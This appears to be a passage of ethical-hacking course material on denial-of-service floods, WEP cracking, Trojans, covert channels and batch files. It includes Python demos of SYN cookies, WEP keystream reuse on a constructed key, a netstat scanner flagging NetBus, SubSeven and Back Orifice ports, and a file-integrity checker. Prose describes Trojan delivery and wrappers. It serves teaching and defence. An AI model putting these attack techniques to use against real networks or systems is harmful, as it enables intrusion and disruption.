The SYN attack exploits TCP/IP's three-way handshake. Thus, in order to understand how SYN attacks work, you first need to know how TCP/IP establishes a connection between two systems. Whenever a client wants to establish a connection with a host, three steps take place. These three steps are referred to as the three-way handshake.

In a normal three-way handshake, the client sends a SYN packet to the host, and the host replies to this packet with a SYN/ACK packet. Then the client responds with an ACK (acknowledgement) packet. This will be clearer after the following depiction of these steps:

1. Client --------SYN Packet--------------> Host

In the first step the client sends a SYN packet to the host with which it wants to establish a connection. The SYN packet requests a connection from the remote system. It also contains the Initial Sequence Number, or ISN, of the client, which is needed by the host to put the fragmented data back in the correct sequence.

2. Host -------------SYN/ACK Packet----------> Client

In the second step, the host replies to the client with a SYN/ACK packet. This packet acknowledges the SYN packet sent by the client and sends the client the host's own ISN.

3. Client --------------ACK-----------------------> Host

In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with an ACK packet. These three steps together are known as the 3-way handshake, and only when they are completed is a complete TCP/IP connection established.


In a SYN attack, several SYN packets are sent to the server, but all these SYN packets have a bad source IP address. When the target system receives these SYN packets with bad IP addresses, it tries to respond to each one of them with a SYN/ACK packet. The target system then waits for an ACK message to come from the bad IP address. However, as the bad IP does not actually exist, the target system never receives the ACK packet. It thus queues up all these requests until it receives an ACK message; the requests are not removed unless and until the target system gets an ACK. Hence these requests take up, or occupy, valuable resources of the target machine. To actually affect the target system, a large number of SYN packets with bad IPs have to be sent. As these packets have a bad source IP, they queue up, use up the resources and memory of the target system, and eventually crash, hang or reboot it.
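The backlog exhaustion described above, next to the SYN-cookie defence that lets a server answer step 1 without storing state, as an added example that is not from the study material. The secret, backlog size and addresses are constructed, and the same simulation also walks through the 3-step startup and ISN exchange from the Session Hijacking chapter.

```python
import hashlib
import hmac
import random

# Constructed demo values: a real stack rotates the secret and sizes the
# backlog per listening socket.
SECRET = b"constructed-demo-secret"
BACKLOG = 4             # half-open connections the server is willing to hold
MASK = 0xFFFFFFFF       # TCP sequence numbers are 32-bit


class Listener:
    """Server side of the 3-step startup, with or without SYN cookies."""

    def __init__(self, syn_cookies=False):
        self.syn_cookies = syn_cookies
        self.half_open = {}      # (ip, port) -> server ISN; only used without cookies
        self.established = set()
        self.dropped = 0

    def _cookie(self, ip, port, client_isn, minute):
        # Stateless ISN: keyed hash over the peer identity and a time slot, so the
        # server can recognise a genuine step 3 without having remembered step 1.
        msg = f"{ip}:{port}:{client_isn}:{minute}".encode()
        mac = hmac.new(SECRET, msg, hashlib.sha256).digest()
        return int.from_bytes(mac[:4], "big")

    def on_syn(self, ip, port, client_isn, now=0):
        """Step 1 arrives; returns (server ISN, ack) for the SYN/ACK, or None if dropped."""
        if self.syn_cookies:
            server_isn = self._cookie(ip, port, client_isn, now // 60)
            return (server_isn, (client_isn + 1) & MASK)
        if len(self.half_open) >= BACKLOG:
            self.dropped += 1    # backlog full: this is the denial of service
            return None
        server_isn = random.getrandbits(32)   # remembered until the ACK (or a timeout)
        self.half_open[(ip, port)] = server_isn
        return (server_isn, (client_isn + 1) & MASK)

    def on_ack(self, ip, port, client_isn, ack, now=0):
        """Step 3 arrives; True if the connection becomes established."""
        key = (ip, port)
        if self.syn_cookies:
            # Nothing was stored; recompute the cookie for this and the previous slot.
            for minute in (now // 60, now // 60 - 1):
                if (ack - 1) & MASK == self._cookie(ip, port, client_isn, minute):
                    self.established.add(key)
                    return True
            return False
        server_isn = self.half_open.get(key)
        if server_isn is None or ack != (server_isn + 1) & MASK:
            return False
        del self.half_open[key]
        self.established.add(key)
        return True


def simulate(syn_cookies, flood_size=20):
    """Spoofed SYNs that never complete, followed by one legitimate client."""
    srv = Listener(syn_cookies)
    for i in range(flood_size):
        srv.on_syn(f"203.0.113.{i}", 40000 + i, 1000 + i)   # bad sources never ACK
    reply = srv.on_syn("192.0.2.7", 51515, 7777)
    if reply is None:
        return False                      # legitimate SYN dropped
    server_isn, _ = reply
    return srv.on_ack("192.0.2.7", 51515, 7777, (server_isn + 1) & MASK)


if __name__ == "__main__":
    print("plain backlog  :", "served" if simulate(False) else "denied")
    print("with SYN cookies:", "served" if simulate(True) else "denied")
```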

Land Attacks

A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP

Address, the IP address of the target system itself is used. This creates an infinite loop

between the target system and the target system itself. However, almost all systems have filters

or firewalls against such attacks.

Smurf Attacks

A Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests

are sent to a system (normally the router) in the Target Network, using Spoofed IP Addresses

from within the target network. As and when the router gets a PING message, it will route it or

echo it back, in turn flooding the Network with Packets, and jamming the traffic. If there are a large

number of nodes, hosts etc in the Network, then it can easily clog the entire network and prevent

any use of the services provided by it. Read more about the Smurf Attacks at CERT:

http://www.cert.org/advisories/CA-98.01.smurf.html

UDP Flooding

This kind of flooding is done against two target systems and can be used to stop the services

offered by any of the two systems. Both of the target systems are connected to each other, one

generating a series of characters for each packet received or in other words, requesting UDP

character generating service while the other system, echoes all characters it receives. This creates

an infinite non-stopping loop between the two systems, making them useless for any data

exchange or service provision.

Distributed DOS Attacks

DoS attacks are not new; in fact they have been around for a long time. However, there has been a recent wave of Distributed Denial of Service attacks which pose a great threat to security and are on the verge of overtaking viruses/trojans as the deadliest threat to Internet security. In almost all of the above TCP/IP vulnerabilities being exploited by hackers, there is a high chance of the target's system administrator or the authorities tracing the attacks and getting hold of the attacker. What is commonly done now is this: say a group of 5 hackers join together and decide to bring a Fortune 500 company's server down. Each one of them breaks into a smaller, less protected network and takes it over. So now they have 5 networks and, supposing there are around 20 systems in each network, that gives these hackers around 100 systems in all to attack from. Sitting at their home computers, they connect to the hacked, less protected networks, install a Denial of Service tool on these hacked networks, and use these hacked systems in the various networks to launch attacks on the actual Fortune 500 company. This makes the hackers harder to detect and helps them do what they wanted to do without getting caught. As they have full control over the smaller, less protected networks, they can easily remove all traces before the authorities get there. Not even a single system connected to the Internet is safe from such DDoS attacks. All platforms, including UNIX and Windows NT, are vulnerable to such attacks. Even MacOS has not been spared, as some of those machines are being used to conduct such DDoS attacks.

Preventing DoS Attacks

No solution provides complete protection against DoS attacks, but several measures reduce their impact:

Practice the principle of least privilege

Rate-limit bandwidth per source and per service

Configure strict ingress and egress filtering (drop packets with spoofed source addresses at the border, in both directions)

Keep systems up to date and patched

Implement load balancing

Implement an IDS

DoS Scanning Tools

If you believe that your computer may have been compromised and turned into a DDoS agent, use a scanning tool to check for installed agents (zombies). Tools written for this purpose include Find_ddos, SARA, DDoSPing, RID and Zombie Zapper. They look for the classic trinoo, TFN and Stacheldraht agents; current malware needs a current scanner or endpoint detection product.


9. WIRELESS HACKING

Introduction –Wireless Networking

Wireless networking technology is becoming increasingly popular and has introduced several security issues at the same time.

The popularity of wireless technology is driven by two primary factors:

Convenience

Cost

A wireless local area network (WLAN) allows workers to access digital resources without being tied to their desks. Laptops can be carried into meetings or even into a Starbucks café and connected to a wireless network, and this convenience has become affordable.

Business and Wireless Attacks

Businesses are at high risk from wireless attackers, who need no physical entry into the premises to reach the network and can compromise it with freely available tools.

War driving, war chalking and war flying are some of the ways an attacker locates and assesses the vulnerability of a firm's wireless network: the radio signal usually extends well beyond the walls, into the street or car park.

Components of a Wireless Network

Wi-Fi Radio devices

Access points

Gateways


Types of Wireless Network

Four basic types

Peer to peer

Extension to a wired network

Multiple access points

LAN to LAN Wireless network

Setting up WLAN

When setting up a WLAN, the channel and the service set identifier (SSID) must be configured in addition to the traditional network settings such as IP address and subnet mask.

The channel designates the frequency on which the network operates; in the 2.4 GHz band it is a number between 1 and 11 in North America (1 to 13 in most other regulatory domains).

The SSID is an alphanumeric string that differentiates networks operating on the same channel. It is essentially a configurable name that identifies an individual network. These settings are important when identifying WLANs and sniffing their traffic.

SSID (Service Set Identifier)

The SSID is the identifier that wireless devices use to find, join and stay attached to a particular network.

The SSID is not a password, even though it is sometimes treated as one. It is broadcast in the clear in beacon frames, and even when SSID broadcasting is disabled it still appears in clients' probe and association frames, so a sniffer recovers it in seconds.

Security problems arise when the default values (SSID, administrative password, channel) are left unchanged, because such devices are easily identified and compromised.

What is Wired Equivalent Privacy (WEP)

WEP is a component of the original IEEE 802.11 WLAN standard. Its purpose was to provide confidentiality for data on wireless networks at a level equivalent to that of wired LANs.

Wired LANs typically rely on physical controls to prevent unauthorised users from connecting to the network and viewing data; a wireless LAN can be reached without physically connecting to anything.

The IEEE therefore chose to encrypt at the data link layer to prevent eavesdropping, using the RC4 stream cipher with a CRC-32 integrity check. As the WEP section below explains, the way RC4 was used is the source of WEP's weaknesses.


Denial-of-Service attacks

Wireless LANs are susceptible to the same protocol-based attacks that plague wired networks. In addition, WLANs send information by radio on unlicensed frequencies, so they are also susceptible to interference, deliberate or inadvertent, from other traffic in the same band.

DoS attacks against a WLAN can target any of three layers:

Physical layer (radio jamming)

Data link layer (forged deauthentication or disassociation frames)

Network layer (the usual IP-level floods)

Man-in-the-Middle Attacks (MITM)

Eavesdropping happens when an attacker captures a data communication stream. Without end-to-end protection such as IPsec, SSH or SSL/TLS the data is exposed to any unauthorised user within radio range.

Manipulation is an extended step beyond eavesdropping: the attacker alters or injects traffic, for example after ARP poisoning to redirect the victim's traffic through the attacker's machine.

Hacking Wireless Networks

Wireless networking technologies become more popular every day. The reasons are simple: wireless networks are easy to configure, easy to use, need no cabling and are inexpensive.

802.11 Standards

The IEEE 802.11 committee sets the standards for the wireless protocol. The three standards in use when this material was written are:

802.11a – speeds up to 54 Mbps, 5 GHz band

802.11b – speeds up to 11 Mbps, 2.4 GHz band

802.11g – speeds up to 54 Mbps, 2.4 GHz band, backward compatible with 802.11b

Later amendments (802.11n, ac, ax) are faster, but the security mechanisms discussed here apply to all of them.


WEP

WEP (Wired Equivalent Privacy) was originally designed to protect wireless networks from eavesdropping using a 40-bit secret key. The key was limited to 40 bits because of US export rules in force in the late 1990s when 802.11 was developed; a 104-bit variant was added later. Neither length matters much, because WEP is broken by design rather than by brute force. The per-packet RC4 key is formed by prepending a 24-bit initialization vector (IV) to a key that never changes, so IVs repeat after a few thousand packets and the keystream is reused, and certain "weak" IVs leak bytes of the secret key (the Fluhrer-Mantin-Shamir attack and its successors). On a busy network the key can be recovered in minutes. Fortunately there are stronger mechanisms:

WPA – Wi-Fi Protected Access, the replacement for WEP (superseded in turn by WPA2 and WPA3)

LEAP – Cisco's Lightweight Extensible Authentication Protocol (its MS-CHAP-based exchange is itself open to offline dictionary attack, so it is no longer recommended)

PEAP – Protected Extensible Authentication Protocol, which wraps the authentication exchange in a TLS tunnel
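The following is an added example, not part of the original material and not code from any tool it names, showing why a 24-bit IV on a static key is fatal. It implements RC4 from its textbook definition and builds a WEP-style per-packet key (IV || root key); the root key, IVs and packet contents are constructed for the demonstration.

```python
# Added example (not from the original material): WEP keystream reuse.
# RC4 is implemented from its textbook definition; the root key, IVs and
# packet contents below are constructed for the demonstration.
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key-scheduling algorithm (KSA) then keystream (PRGA)
    XORed onto the data. Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                           # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP forms the per-packet RC4 key as IV || root key.  The IV is 3 bytes
    (24 bits) and travels in the clear in the frame header; the root key is the
    static 40- or 104-bit secret shared by every station."""
    if len(iv) != 3:
        raise ValueError("WEP IV must be 24 bits")
    return rc4(iv + root_key, plaintext)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(root_key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Two packets sent under the same IV are encrypted with the same keystream,
    so C1 XOR C2 == P1 XOR P2.  An eavesdropper who sees both ciphertexts (and
    the IVs, which are public) learns this without knowing the key."""
    c1 = wep_encrypt(root_key, iv, p1)
    c2 = wep_encrypt(root_key, iv, p2)
    return xor_bytes(c1, c2)


def recover_with_known_plaintext(root_key: bytes, iv: bytes, known_p1: bytes, p2: bytes) -> bytes:
    """If one of the two plaintexts is predictable (ARP and DHCP packets largely
    are), the other falls out directly: P2 = (C1 XOR C2) XOR P1."""
    return xor_bytes(keystream_reuse_leak(root_key, iv, known_p1, p2), known_p1)


def expected_packets_until_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday bound: with N possible IVs chosen at random, a repeat is expected
    after roughly sqrt(pi * N / 2) packets.  Many cards counted IVs sequentially
    from zero instead, which guarantees collisions whenever a card resets."""
    n = 2 ** iv_bits
    return math.sqrt(math.pi * n / 2)


if __name__ == "__main__":
    root_key = bytes.fromhex("0102030405")          # constructed 40-bit key
    iv = b"\x00\x00\x01"                            # constructed IV
    p1 = b"GET /index.html HTTP/1.0"                # "known" packet
    p2 = b"Authorization: Basic Zm9v"               # packet we want to read
    print("P1 XOR P2 leaked:", keystream_reuse_leak(root_key, iv, p1, p2).hex())
    print("P2 recovered    :", recover_with_known_plaintext(root_key, iv, p1, p2))
    print("packets until an IV repeats (random IVs): ~%d" % expected_packets_until_iv_repeat())
```

The IV space is only 16,777,216 values, so with random IVs a repeat is expected after roughly 5,100 packets, which a busy access point sends in seconds; the FMS family of attacks then goes further and recovers the root key itself from the weak-IV packets. WPA2's per-packet keys and 48-bit counters exist precisely to close this hole.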

Finding WLANs

Finding unsecured wireless networks has become quite a fad; some hackers make a game of driving around and connecting to as many networks as they can. One of the best known tools for finding WLANs is NetStumbler, which actively sends probe requests; Kismet, mentioned below, finds networks passively, including those that do not broadcast their SSID.

Cracking WEP Keys

Because of the weaknesses of WEP, a WEP-protected network can be broken as long as enough encrypted packets with distinct IVs can be captured (tens of thousands are typically sufficient, and traffic can be provoked by replaying captured ARP packets). Two early tools for this were AirSnort and WEPCrack; the aircrack-ng suite is the current standard.

Sniffing Traffic

Just as in the wired world, there are tools to capture and sniff wireless traffic, among them AiroPeek and Kismet. The wireless card must support monitor mode to see frames that are not addressed to it.

Wireless Attacks

Wireless networks can be attacked by several different methods. The two most common are wireless DoS and access point spoofing (an "evil twin" access point carrying the victim's SSID that clients associate with instead of the real one).

Securing Wireless Networks

Fortunately, there are ways to secure wireless networks. Historically the starting point was to turn on WEP and change the SSID; today WEP must be treated as no protection at all, and the first step is WPA2 or WPA3 with a long random passphrase or, in a business, 802.1X authentication. Changing the SSID is still worthwhile so that the vendor and default configuration are not advertised, but remember that it is transmitted in clear text and is not a secret. Continue by carefully considering the placement and transmit power of your access points and restricting DHCP allocation on the wireless segment. Other considerations include:

Restrict access to known MAC addresses (easily bypassed by an attacker who clones an observed address, so treat it as a nuisance for casual users, not a control)

Use strong authentication such as RADIUS (802.1X/EAP)

Consider IPsec or a VPN across the wireless segment

Build a network that maintains defence in depth: treat the WLAN as untrusted and firewall it from the wired LAN


10. TROJANS & BACKDOORS

Trojan horses are programs that are malicious in nature but disguised as benign. Once executed, they plant unwanted malicious code on the user's computer. These programs can, among other things, steal passwords, provide remote access, log keystrokes or destroy data.

Many Trojans are in effect remote administration tools (RATs) that give the attacker remote control of and access to the victim system: once a system has been infected, the attacker can control almost all of its hardware and software from a distance. Modern Trojans are extremely advanced and offer a variety of sophisticated remote control features. Once a Trojan is installed, not only is all the data on the system at risk, there is also a high chance that the compromised system will be misused to attack a third party.

Trojans are clearly dangerous tools capable of doing a lot of harm to the victim system. Some of the most common malicious activities conducted with Trojans are:

Stealing sensitive data and intellectual property from the victim organization

Logging keystrokes, screens and credentials (many Trojans have built-in logging)

Purely destructive actions such as wiping or corrupting data

Using the resources of your system and network to attack pre-defined third-party victims

What is a Trojan Horse?

The story of the Trojan Horse comes from Greek legend (told in Virgil's Aeneid and recalled in Homer's Odyssey, though not in the Iliad itself). After a long siege, the Greeks left a tall wooden horse outside the gates of Troy and pretended to sail away. The Trojans took the gift inside the city, and during the night the soldiers hidden in the horse slipped out and opened the gates. Trojan programs work the same way: they require the user to accept the malicious gift. Once executed, the system is infected, so the best defence is to train users not to download or install unsolicited applications.

Working

The working of Trojans is easy to understand and using them requires almost no technical knowledge. Most Trojans consist of two main parts:

1. The server part, which is installed on the victim's system through trickery or disguise.

2. The client part, which is installed on the attacker's system and is used to connect to the server part on the victim's system.


An attacker carries out a Trojan attack on a target system with the following simple steps:

1. The first step is to find a way to install the server part of the Trojan on the target system. This is probably the hardest step of the attack. Some of the most common delivery routes are:

E-mail attachments

Autorun CD-ROMs and USB media

Instant messengers

Physical access

EXE binders (see Wrappers below)

2. Once the server part is installed on the victim's system, it binds to a particular port and listens for connections. Each classic Trojan listens on a pre-defined port; for example, the NetBus Trojan listens on port 12345. (Most modern Trojans instead connect back out to the attacker, because outbound connections pass through NAT and firewalls that block inbound ones.)

3. Next the attacker needs to find out the IP address of the target system on which the server part has been installed. Many Trojans report it automatically; SubSeven, for example, could notify the attacker by e-mail or ICQ.

4. Finally, the attacker uses the client part of the Trojan (installed on his own system) to connect to the server part on the target.

5. On most occasions, after compromising the target with a Trojan, attackers install a backdoor on it so that the next time they want access to the same system the cumbersome process above need not be repeated.

Common Trojans and Backdoors

The most common Trojans give the attacker remote access to the victim's computer. Various means are used to trick the user into installing the program; once installed, the attacker has complete access to the machine, as if sitting at its keyboard. Common ways Trojans are acquired include e-mail attachments, untrusted web sites, peer-to-peer programs (e.g., Kazaa) and instant messenger downloads. Several of the best known Trojans are Back Orifice 2000, QAZ, Tini, Donald Dick, SubSeven, NetBus and Beast. Netcat, often listed alongside them, is a general-purpose networking tool rather than a Trojan, but it is routinely planted as a backdoor listener or reverse shell.

Wrappers

Wrappers (also called binders or joiners) are programs that combine a Trojan with a legitimate program into a single executable. The wrapped executable is sent to the victim, who sees only the legitimate program and, on running it, is tricked into installing the Trojan as well. Not every wrapper gives the attacker a convincing icon, so tools such as Michelangelo or IconPlus are used to change the executable's icon to anything from a Microsoft Office 2000 document to the setup icon of the latest computer game.

Covert Channels

Covert channels rely on the principle that you cannot deny what you must permit. If protocols such as HTTP, ICMP and DNS are allowed through the firewall, malicious programs will hide their command and data traffic inside those protocols. Three of the best known covert channel programs are:

AckCmd – uses TCP ACK segments as a covert channel (ACK-only packets pass stateless filters that permit "established" traffic)

Loki – uses ICMP echo request and reply payloads as a covert channel

Reverse WWW Shell – uses outbound HTTP requests as a covert channel, so the compromised host polls the attacker the way a browser would

Backdoor Countermeasures

The cheapest countermeasure is educating users not to download and install applications from e-mail or the Internet. Anti-virus software must also be installed and kept current; outdated anti-virus software is of little to no value. If you suspect a computer has been infected with a Trojan or backdoor:

use a port-monitoring tool to investigate listening ports and the processes behind them, and

use a cleaner to remove the malicious software, or, if the system's integrity cannot be established, rebuild it.

Port Monitoring Tools

The tools listed below are a quick and simple way to investigate the programs and processes running on a computer. Even without add-on tools you can get a good look at running processes and applications with the GUI Task Manager, and the built-in command-line tool netstat lists open ports and, with the -o switch on Windows, the owning process ID. Dedicated port-monitoring tools that map ports to processes include Fport, TCPView, Process Viewer and Inzider. Compare what you find against what the machine is supposed to run: an unexplained listener is a lead whatever its port number.
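As an added example, not part of the original material and not code from Fport, TCPView or any other tool named above, here is the triage logic a port-monitoring check boils down to: parse a netstat-style listing, flag listeners on known Trojan default ports, then flag anything not on the machine's expected-service allowlist. NetBus's port comes from the text; the SubSeven and Back Orifice defaults are widely documented but, like all of them, trivially changed by an attacker. The netstat output and the allowlist are constructed for the demonstration.

```python
# Added example (not from the original material and not part of any tool named
# above): triage a netstat-style listing for suspicious listeners.
# NetBus's port is from the text; the other two defaults are widely documented
# but all are trivially reconfigured, so a hit is a lead, not proof.
# The netstat output and allowlist below are constructed.
from typing import Dict, List, NamedTuple, Optional, Set, Tuple

KNOWN_TROJAN_PORTS: Dict[int, str] = {
    12345: "NetBus",
    27374: "SubSeven",
    31337: "Back Orifice",
}


class Listener(NamedTuple):
    proto: str
    addr: str
    port: int
    pid: Optional[int]


def parse_netstat(text: str) -> List[Listener]:
    """Parse `netstat -ano` style output (Windows layout) into listening sockets.
    TCP rows count only in LISTENING state; every bound UDP socket counts."""
    listeners: List[Listener] = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue                                # header, blank, or unknown row
        addr, _, port = fields[1].rpartition(":")   # rpartition copes with [::]:port
        if fields[0] == "TCP":
            if len(fields) < 4 or fields[3] != "LISTENING":
                continue                            # ESTABLISHED, TIME_WAIT, ...
            pid = int(fields[4]) if len(fields) > 4 and fields[4].isdigit() else None
        else:
            pid = int(fields[3]) if len(fields) > 3 and fields[3].isdigit() else None
        listeners.append(Listener(fields[0], addr, int(port), pid))
    return listeners


def triage(listeners: List[Listener], allowlist: Set[Tuple[str, int]]) -> List[Tuple[Listener, str]]:
    """Flag listeners on known Trojan ports, then anything not in the allowlist.
    The allowlist is what this particular machine is *supposed* to serve."""
    findings: List[Tuple[Listener, str]] = []
    for l in listeners:
        if l.port in KNOWN_TROJAN_PORTS:
            findings.append((l, "default port of " + KNOWN_TROJAN_PORTS[l.port]))
        elif (l.proto, l.port) not in allowlist:
            findings.append((l, "listener not in expected-service allowlist"))
    return findings


def pids_to_investigate(findings: List[Tuple[Listener, str]]) -> Set[int]:
    """Process IDs behind flagged sockets: look each one up in Task Manager or
    Process Viewer and check the image path on disk before killing anything."""
    return {l.pid for l, _ in findings if l.pid is not None}


# Constructed sample in the layout of `netstat -ano` on Windows.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       2204
  TCP    192.168.1.10:4444      0.0.0.0:0              LISTENING       3120
  TCP    192.168.1.10:1042      10.0.0.5:80            ESTABLISHED     1500
  UDP    0.0.0.0:137            *:*                                    4
  UDP    0.0.0.0:31337          *:*                                    2204
"""

# Assumed baseline for a plain domain-joined workstation (constructed).
WORKSTATION_ALLOWLIST: Set[Tuple[str, int]] = {("TCP", 135), ("TCP", 445), ("UDP", 137), ("UDP", 138)}


def demo() -> List[Tuple[Listener, str]]:
    return triage(parse_netstat(SAMPLE_NETSTAT), WORKSTATION_ALLOWLIST)


if __name__ == "__main__":
    for listener, reason in demo():
        print(f"{listener.proto} {listener.addr}:{listener.port} pid={listener.pid}  ->  {reason}")
    print("investigate PIDs:", sorted(pids_to_investigate(demo())))
```

Two listeners sharing one process ID (here 2204, on both a NetBus and a Back Orifice port) is the kind of correlation a port list alone hides and a per-process view makes obvious; the allowlist check is what catches a Trojan that has been moved to an innocuous-looking port.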

System File Verification

Whenever a Trojan is discovered, you need to investigate thoroughly how much damage has been done. Remember the three basic tenets of security: confidentiality, integrity and availability; one or more has most likely been violated. If you are no longer sure of the integrity of the file system, you must reinstall from known good media and backups. Tools that help verify the integrity of a system include WFP (Windows File Protection), md5sum and Tripwire. Note that a hash list only proves anything if it was taken before the compromise and kept where the attacker could not alter it, and that MD5 is collision-prone, so new baselines should use SHA-256.
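The following is an added example, not part of the original material and not Tripwire's or WFP's own code: a minimal file-integrity baseline and verifier of the kind those tools implement, using SHA-256 rather than MD5. The directory tree it checks is built in a temporary directory with constructed contents.

```python
# Added example (not from the original material and not Tripwire's or WFP's
# code): baseline a directory tree, then detect modified, added and removed
# files.  The tree and its contents are constructed in a temporary directory.
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def hash_file(path: Path, algorithm: str = "sha256") -> str:
    """Stream the file through the hash so large binaries need not fit in memory."""
    h = hashlib.new(algorithm)
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, Dict[str, object]]:
    """Record hash, size and permission bits for every regular file under root.
    Keys are POSIX-style relative paths so the baseline is portable."""
    baseline: Dict[str, Dict[str, object]] = {}
    for p in sorted(root.rglob("*")):
        if p.is_symlink() or not p.is_file():
            continue
        st = p.stat()
        baseline[p.relative_to(root).as_posix()] = {
            "sha256": hash_file(p),
            "size": st.st_size,
            "mode": st.st_mode & 0o7777,
        }
    return baseline


def verify(root: Path, baseline: Dict[str, Dict[str, object]]) -> Dict[str, List[str]]:
    """Compare the tree as it is now against the baseline.  Timestamps are
    deliberately not consulted: an attacker with root can set any mtime, but
    cannot produce a replacement file with a chosen SHA-256."""
    current = build_baseline(root)
    report: Dict[str, List[str]] = {"modified": [], "added": [], "removed": []}
    for name, record in baseline.items():
        if name not in current:
            report["removed"].append(name)
        elif current[name] != record:
            report["modified"].append(name)
    report["added"] = [name for name in current if name not in baseline]
    for key in report:
        report[key].sort()
    return report


def demo() -> Dict[str, List[str]]:
    """Baseline a small tree, simulate a Trojan's changes, and verify."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"original ls binary")      # constructed
        (root / "hosts").write_text("127.0.0.1 localhost\n")
        (root / "old.cfg").write_text("keep=1\n")
        baseline = build_baseline(root)           # taken while the system is clean

        (root / "bin" / "ls").write_bytes(b"trojaned ls binary")      # same size, new content
        (root / "bin" / "nc").write_bytes(b"backdoor listener")       # dropped tool
        (root / "old.cfg").unlink()                                   # config/log removed
        return verify(root, baseline)


if __name__ == "__main__":
    for kind, names in demo().items():
        print(f"{kind:9s}: {names}")
```

The replaced binary keeps its original size, which is why size and timestamp checks alone are not enough. In practice the baseline must be stored off the host or signed (Tripwire signs its database) and the verifier run from trusted media, because an attacker with root can otherwise simply regenerate it.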

11. BATCH PROGRAMMING & VIRUS CODING

Viruses

A computer virus is a piece of code that replicates by inserting copies of itself into other programs or files, usually carrying a malicious payload as well. Viruses do not execute spontaneously; they must be given control by an overt act, such as opening an executable attached to an e-mail message, or by an implicit permission that lets your software (Internet Explorer, for example) run certain kinds of programs or scripts automatically. Typically, when a virus gets control it copies itself into other files on the system and then tries to hitch a ride to other computers via e-mail or other network-based means. Viruses spread only by infecting other objects such as programs, files, documents or e-mail attachments; if a virus fails to infect anything, it cannot spread. Well-known viruses that have destroyed data and infected computer systems include CIH (Chernobyl), ExploreZip, ILOVEYOU and Melissa.

Unlike a virus, a worm is a self-contained, self-propagating program: it copies itself from one computer to another over the network, often by exploiting a vulnerable service and without any user action. Well-known worms that have destroyed data and infected computer systems include Pretty Park, Code Red, Klez, BugBear, Opaserv, SQL Slammer, Blaster and Nimda.

Batch Programming

Batch file programming is the DOS and Windows counterpart of Unix shell scripting. Start by understanding what happens when you give a DOS command. DOS's command interpreter is a file called command.com (on Windows NT and later the equivalent is cmd.exe, which runs the same batch files). It is command.com that handles the commands you type at the prompt, such as COPY, DIR and DEL. These commands are built into command.com and are called internal commands. DOS also has external commands such as FORMAT, UNDELETE and BACKUP, each of which is a separate program on disk. So whenever you give a command, command.com either executes it itself (internal commands) or loads the separate program, which does the work and returns the result (external commands).

Why do we need Batch File Programs?

Say you need to run the same set of commands over and over again for a routine task such as backing up important files or deleting temporary files (*.tmp, *.bak, ~*.* and so on). Typing the same commands each time is tedious and error-prone. Batch files exist to run such a set of commands repeatedly: they are to DOS what macros are to Microsoft Office, an automated, predefined set of tasks.

How to create batch files?

Batch files are plain text files containing DOS commands, so any plain-text editor will do, such as Notepad or the DOS editor (EDIT). All you need to remember is that a batch file must have the extension .BAT. Executing a batch file is simple too: if you save a batch file as batch.bat, you run it by typing:

C:\windows>batch.bat

What happens when you give a Batch file to the command.com to execute?

Whenever command.com comes across a batch file, it goes into batch mode. In batch mode it reads the commands from the batch file line by line: it opens the batch file, reads the first line and closes the file again, executes that command, then reopens the file and reads the next line, and so on until the end. (This is why editing a batch file while it is running changes its behaviour.) The batch file itself is handled by command.com rather than loaded as a separate program, which is why it is usually described as running internally.


Note

While creating a batch file, keep in mind that its filename should not be the same as a DOS command. For example, if you create a batch file called dir.bat and try to run it at the prompt, the built-in DIR command runs instead and your batch file is never touched. When command.com comes across a command it first checks whether it is an internal command; only if it is not does it look for a .COM, .EXE or .BAT file with a matching name, in that order. Because all external DOS commands are .COM or .EXE files, a batch file with the same name as one of them will never be reached either.

First take up a simple batch file that launches a .EXE program. Type the following into a blank text file and save it with a .BAT extension:

C:
cd windows
telnet

Now let's analyse the code. The first line tells command.com to switch to drive C:, the next changes the current directory to Windows, and the last line launches the telnet client. You might object that the full filename is telnet.exe. Yes, but the .exe extension is added automatically by command.com. Normally we do not need to change the drive and directory at all, since the Windows directory is the default DOS folder, so the batch file could simply contain the single line

telnet

and would still work.

Launch command.com (DOS) and execute the batch file by typing:

C:\WINDOWS>batch_file_name

Command.com echoes each line of the batch file as it executes it. With a one-line batch file containing scandisk instead of telnet you would see:

C:\WINDOWS>scandisk

and Scandisk is launched. So now you know the basic functioning of batch files.

Let's move on to Batch file commands

The REM Command

The simplest batch file command is REM, the remark command. Programmers use it extensively to insert comments into their code to make it more readable and understandable. Anything on the line after REM is ignored by command.com; with echoing turned off (see below) the line is not even displayed on the screen during execution.

ECHO: The Batch Printing Tool

The ECHO command is what the print statement is in other programming languages: it displays something on the screen. It can be used to tell the user what the batch file is currently doing.


By default command.com echoes each command to the screen before running it. We can stop a particular command from being shown, while still executing it, by preceding it with an @ sign; ECHO OFF (usually written @ECHO OFF as the first line) turns echoing off for the rest of the file.

The EXIT command ends your batch file; note that under command.com it also terminates the interpreter session the batch file was started from.

Virus Writing

Types of Viruses

Boot Viruses

Program Viruses

Multipartite Viruses

Stealth Viruses

